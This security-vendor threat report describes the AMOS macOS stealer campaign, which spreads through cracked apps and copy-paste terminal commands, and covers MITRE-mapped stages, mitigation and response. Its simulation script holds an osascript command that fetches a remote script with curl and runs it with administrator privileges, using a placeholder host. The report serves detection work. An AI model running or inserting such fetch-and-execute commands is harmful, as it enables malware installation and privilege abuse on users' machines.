AMOS Stealer Targets macOS Through “Cracked” Apps

SOC Prime Team

AMOS Stealer Targets macOS Through “Cracked” Apps

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

The report describes a campaign distributing Atomic macOS Stealer (AMOS) by disguising it as cracked applications or by instructing users to run copy-and-paste terminal commands. Once executed, the malware collects a broad set of sensitive data, including credentials, browser information, cryptocurrency wallets, messaging application files, VPN profiles, and personal documents, then exfiltrates the stolen content over HTTP or HTTPS. To avoid static detection, the operators rotate domains and URLs throughout the campaign. The activity is aimed at macOS users, particularly those seeking unofficial or pirated software.

Investigation

Trend Vision One telemetry was used to reconstruct the full infection chain, beginning with downloads of cracked applications from haxmac.cc, followed by redirection through intermediary domains, execution of malicious shell scripts, creation of launch daemons for persistence, staging of data in /tmp, compression into ZIP archives, and exfiltration to rotating attacker-controlled domains. Researchers captured the relevant command lines, file paths, and behavioral indicators associated with each stage of the compromise.

Mitigation

Organizations should educate users about the risks of cracked software and copy-paste terminal commands, enforce Gatekeeper and notarization controls, and limit unnecessary script execution on macOS systems. Defenders should also monitor for suspicious curl and osascript activity and block access to known malicious domains and IP addresses. Endpoint detections should focus on unauthorized launch daemon creation, hidden file placement, and unusual file collection or exfiltration behavior.

Response

If AMOS activity is detected, isolate the affected endpoint, terminate the malicious processes, remove hidden files such as .helper, .agent, and com.finder.helper.plist, and delete any staged data prepared for exfiltration. Compromised credentials should be revoked, and forensic analysis should be performed on any recovered archives. The identified malicious infrastructure should be blocked, and detection content should be updated to monitor for the observed command patterns.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#ffcc99 classDef process fill:#ff9966 classDef data fill:#ccffcc %% Nodes – Actions (Techniques) step1_initial_access_file["Action – T1204.002 User Execution: Malicious File Victim downloads and runs a trojanized .dmg disguised as a cracked application."] class step1_initial_access_file action step2_copy_paste["Action – T1204.004 User Execution: Malicious Copy and Paste Victim copies a curl command from a webpage into Terminal, which downloads and runs install.sh."] class step2_copy_paste action step3_masquerading["Action – T1036 Masquerading Malware presented as legitimate cracked software and fake installer pages."] class step3_masquerading action step4_curl_proxy["Action – T1218 System Binary Proxy Execution The legitimate curl binary fetches malicious scripts."] class step4_curl_proxy action step5_osascript_proxy["Action – T1216 System Script Proxy Execution osascript runs an AppleScript payload to execute code."] class step5_osascript_proxy action step6_shell_interpreter["Action – T1059.004 Command and Scripting Interpreter: Unix Shell Shell commands create directories, collect files, and invoke curl for exfiltration."] class step6_shell_interpreter action step7_sudo_abuse["Action – T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching Captured password supplied to sudo to write a LaunchDaemon plist with root privileges."] class step7_sudo_abuse action step8_persistence["Action – T1569 System Services: LaunchDaemon LaunchDaemon (com.finder.helper.plist) runs the malicious .agent script at system boot."] class step8_persistence action step9_defense_evasion["Action – T1127 Trusted Developer Utilities Proxy Execution Apple developer utilities (osascript) are used to execute the payload, evading defenses."] class step9_defense_evasion action step10_dga["Action – T1568.002 Dynamic Resolution: Domain Generation Algorithms Attacker rotates numerous .cfd and other domains for payload delivery."] class step10_dga action step11_browser_creds["Action – T1555.003 Credentials from Password Stores: Web Browsers Extraction of Chrome, Firefox, Edge login data and cookies."] class step11_browser_creds action step12_keychain["Action – T1555 Credentials from Password Stores Extraction of macOS Keychain items."] class step12_keychain action step13_wallet_keys["Action – T1552.004 Private Keys Theft of cryptocurrency wallet files."] class step13_wallet_keys action step14_session_cookies["Action – T1550.004 Web Session Cookie Collection of session cookies for later reuse."] class step14_session_cookies action step15_archive["Action – T1560 Archive Collected Data Gathered files are compressed into out.zip."] class step15_archive action step16_compression["Action – T1027.015 Compression Data is compressed before exfiltration (obfuscation)."] class step16_compression action step17_exfil_https["Action – T1071.001 Application Layer Protocol: Web Protocols Compressed archive uploaded via HTTPS POST to attackeru2011controlled server."] class step17_exfil_https action step18_indirect_curl["Action – T1202 Indirect Command Execution curl command retrieves and runs a remote script silently."] class step18_indirect_curl action %% Nodes – Tools tool_curl["Tool – Name: curl Description: Commandu2011line utility for transferring data with URLs."] class tool_curl tool tool_osascript["Tool – Name: osascript Description: Executes AppleScript or JavaScript for Automation scripts."] class tool_osascript tool tool_sudo["Tool – Name: sudo Description: Executes commands with elevated privileges."] class tool_sudo tool tool_launchd["Tool – Name: launchd Description: macOS service manager for loading LaunchDaemons and agents."] class tool_launchd tool %% Nodes – Files and Data file_dmg["File – Name: trojanized.dmg Type: Disk image disguised as cracked app"] class file_dmg file file_install_sh["File – Name: install.sh Type: Shell script downloaded via curl"] class file_install_sh file data_out_zip["Data – Name: out.zip Content: Collected files ready for exfiltration"] class data_out_zip data %% Flow Connections step1_initial_access_file –>|downloads & runs| file_dmg file_dmg –>|triggers| step1_initial_access_file step1_initial_access_file –>|leads to| step2_copy_paste step2_copy_paste –>|uses| tool_curl tool_curl –>|downloads| file_install_sh file_install_sh –>|executes| step2_copy_paste step2_copy_paste –>|leads to| step3_masquerading step3_masquerading –>|enables| step4_curl_proxy step4_curl_proxy –>|uses| tool_curl tool_curl –>|fetches| step5_osascript_proxy step5_osascript_proxy –>|uses| tool_osascript tool_osascript –>|executes| step6_shell_interpreter step6_shell_interpreter –>|invokes| step7_sudo_abuse step7_sudo_abuse –>|uses| tool_sudo tool_sudo –>|writes| step8_persistence step8_persistence –>|managed by| tool_launchd tool_launchd –>|runs| step9_defense_evasion step9_defense_evasion –>|facilitates| step10_dga step10_dga –>|provides| step11_browser_creds step10_dga –>|provides| step12_keychain step10_dga –>|provides| step13_wallet_keys step10_dga –>|provides| step14_session_cookies step11_browser_creds –>|collected into| step15_archive step12_keychain –>|collected into| step15_archive step13_wallet_keys –>|collected into| step15_archive step14_session_cookies –>|collected into| step15_archive step15_archive –>|produces| data_out_zip data_out_zip –>|compressed by| step16_compression step16_compression –>|sent via| step17_exfil_https step17_exfil_https –>|uses| tool_curl tool_curl –>|performs| step18_indirect_curl step18_indirect_curl –>|completes| step1_initial_access_file %% Styling class step1_initial_access_file,step2_copy_paste,step3_masquerading,step4_curl_proxy,step5_osascript_proxy,step6_shell_interpreter,step7_sudo_abuse,step8_persistence,step9_defense_evasion,step10_dga,step11_browser_creds,step12_keychain,step13_wallet_keys,step14_session_cookies,step15_archive,step16_compression,step17_exfil_https,step18_indirect_curl action class tool_curl,tool_osascript,tool_sudo,tool_launchd tool class file_dmg,file_install_sh file class data_out_zip data "

Attack Flow

Attack Narrative & Commands:
An adversary has obtained a phishing lure that delivers a short AppleScript payload. The script uses osascript to execute a shell command (sh -c) that invokes curl to download the AMOS stealer binary from a malicious C2 server, stores it in the user’s ~/Library/Application Support/ folder, and then executes it with elevated permissions. The use of osascript (a signed Apple binary) masks the activity as legitimate automation, while curl provides a stealthy network download.

Regression Test Script:

# amos_stealer_simulation.sh
# Simulate AMOS stealer execution on macOS using osascript + curl

# 1. Define malicious URL (use a harmless placeholder for safety)
MALICIOUS_URL="https://example.com/malicious_payload.sh"

# 2. AppleScript that runs a shell command to download & execute the payload
APPLESCRIPT=$(cat <<'EOF'
do shell script "sh -c 'curl -s -o /tmp/payload.sh "https://example.com/malicious_payload.sh" && chmod +x /tmp/payload.sh && /tmp/payload.sh'" with administrator privileges
EOF
)

# 3. Execute the AppleScript via osascript
echo "$APPLESCRIPT" | osascript

# 4. Pause briefly to allow the payload to run
sleep 5

Cleanup Commands:

# cleanup_amos_simulation.sh
# Remove artifacts created by the simulation

# Remove the downloaded payload
rm -f /tmp/payload.sh

# Revoke any temporary elevated processes (if still running)
pkill -f "/tmp/payload.sh" || true

# Optionally, clear the AppleScript execution history
# (macOS does not retain a persistent history for osascript)
echo "Cleanup complete."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free